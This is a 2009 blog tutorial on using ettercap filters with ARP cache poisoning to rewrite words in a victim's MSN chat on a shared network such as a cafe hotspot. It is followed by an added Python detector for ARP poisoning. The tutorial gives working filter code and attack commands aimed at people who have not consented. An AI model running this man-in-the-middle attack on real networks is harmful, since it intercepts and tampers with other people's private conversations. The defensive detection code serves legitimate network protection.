Tuesday, November 24, 2009

Ettercap and Filters (Pwning an MSN convo)

Ettercap is a multi-purpose sniffer that can perform man-in-the-middle attacks on a switched network. It can sniff live connections and modify some of a packet's contents on the fly. What I'm going to show you is how you can modify certain words in an ongoing MSN convo. You will have to be on the same network, so a typical scenario would be an internet cafe or wireless hotspot.
You need to create a filter that tells ettercap to replace one string with another; in our example 'lol' is replaced with 'smh'.

Creating the filter:
BT4:
# touch msn.txt
Open msn.txt in a text editor and type the following:
if (ip.proto == TCP && search(DATA.data, "lol")) { replace("lol", "smh"); msg("filter ran"); }

Save and exit your work.
NB: Just to point out, there must not be any space between the 'e' and '(' in the replace function, and in 'DATA.data' it is necessary for 'DATA' to be in all caps. This language is case sensitive, so writing 'Data.data' would not work.

Next you need to compile msn.txt into a binary filter format that ettercap can load:
# etterfilter -o msn.ef msn.txt

Now we are ready to run ettercap with our newly created filter.
# ettercap -Tq -M ARP:remote -i wlan0 -F msn.ef /victim_with_msn_ip/ /router_ip/

That's all. Now just wait for your victim to send or receive an 'lol' in the convo. Just like magic, 'lol' turns into 'smh'. Note that when you type 'lol', it shows up as 'lol' on your end, but on the other end of the convo it shows up as 'smh', and vice versa. Now feel free to associate the words ettercap and awesome in the same sentence with ease.

IMPORTANT:
In all my tests I found that you always have to perform a man-in-the-middle attack (like ARP cache poisoning) to get the ettercap filters working. Without the ARP cache poisoning, the ettercap console will say that the filter ran, but my packets were not modified or affected.
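Since the technique only works once ARP cache poisoning has put the attacker's machine between the victim and the router, the defensive counterpart is to watch the neighbor table for exactly that. The following is an added example, not code from the original post: it parses Linux `ip neigh`-style output (the sample tables below are constructed) and flags the two classic symptoms of an ARP:remote attack, the gateway's MAC drifting from a known baseline and one MAC answering for several IP addresses. The baseline gateway MAC and the table lines are assumptions made for the demonstration.

```python
import re
from typing import Dict, List, Tuple

# Matches one line of Linux `ip neigh` output, e.g.
# "192.168.1.1 dev wlan0 lladdr 00:11:22:33:44:55 REACHABLE"
NEIGH_RE = re.compile(
    r"^(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+dev\s+(?P<dev>\S+)\s+lladdr\s+"
    r"(?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})\s+(?P<state>\S+)",
    re.IGNORECASE,
)


def parse_neigh(output: str) -> List[Tuple[str, str]]:
    """Return (ip, mac) pairs from neighbor-table text.

    Entries without a link-layer address (FAILED / INCOMPLETE) are skipped
    because they carry no MAC to compare against.
    """
    pairs: List[Tuple[str, str]] = []
    for line in output.splitlines():
        m = NEIGH_RE.match(line.strip())
        if m:
            pairs.append((m.group("ip"), m.group("mac").lower()))
    return pairs


def detect_arp_poisoning(pairs: List[Tuple[str, str]],
                         known_gateway: Tuple[str, str]) -> List[str]:
    """Flag gateway MAC drift against a baseline and MACs claiming several IPs.

    known_gateway is (ip, mac) recorded while the network was trusted;
    it is an assumed baseline, not something derived from the live table.
    """
    findings: List[str] = []
    gw_ip, gw_mac = known_gateway[0], known_gateway[1].lower()
    by_mac: Dict[str, List[str]] = {}
    for ip, mac in pairs:
        by_mac.setdefault(mac, []).append(ip)
        # Symptom 1: the router's IP now resolves to an unexpected MAC.
        if ip == gw_ip and mac != gw_mac:
            findings.append(
                f"gateway {gw_ip} now resolves to {mac}, expected {gw_mac}")
    # Symptom 2: one MAC answers ARP for more than one host, which is what
    # a two-sided (ARP:remote) poisoning looks like from the victim's side.
    for mac, ips in by_mac.items():
        if len(ips) > 1:
            findings.append(
                f"{mac} claims multiple IPs: {', '.join(sorted(ips))}")
    return findings


# Constructed sample tables (not captured from a real network).
CLEAN_TABLE = """\
192.168.1.1 dev wlan0 lladdr 00:11:22:33:44:55 REACHABLE
192.168.1.20 dev wlan0 lladdr 00:aa:bb:cc:dd:20 STALE
192.168.1.77 dev wlan0  FAILED
"""
# Here a third host (aa:bb:cc:dd:ee:01) has answered ARP for the gateway
# and for two peers, so every entry points at the same MAC.
POISONED_TABLE = """\
192.168.1.1 dev wlan0 lladdr aa:bb:cc:dd:ee:01 REACHABLE
192.168.1.20 dev wlan0 lladdr aa:bb:cc:dd:ee:01 REACHABLE
192.168.1.30 dev wlan0 lladdr aa:bb:cc:dd:ee:01 STALE
"""
GATEWAY_BASELINE = ("192.168.1.1", "00:11:22:33:44:55")  # assumed baseline

if __name__ == "__main__":
    for name, table in (("clean", CLEAN_TABLE), ("poisoned", POISONED_TABLE)):
        hits = detect_arp_poisoning(parse_neigh(table), GATEWAY_BASELINE)
        print(name, "->", hits or "no findings")
```

On a real host you would feed `ip neigh show` output into parse_neigh on a timer and alert on any finding; the baseline MAC has to be recorded out of band (for example from the router's own label or admin page), since a table read after poisoning has already started would bake the attacker's MAC into the baseline.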
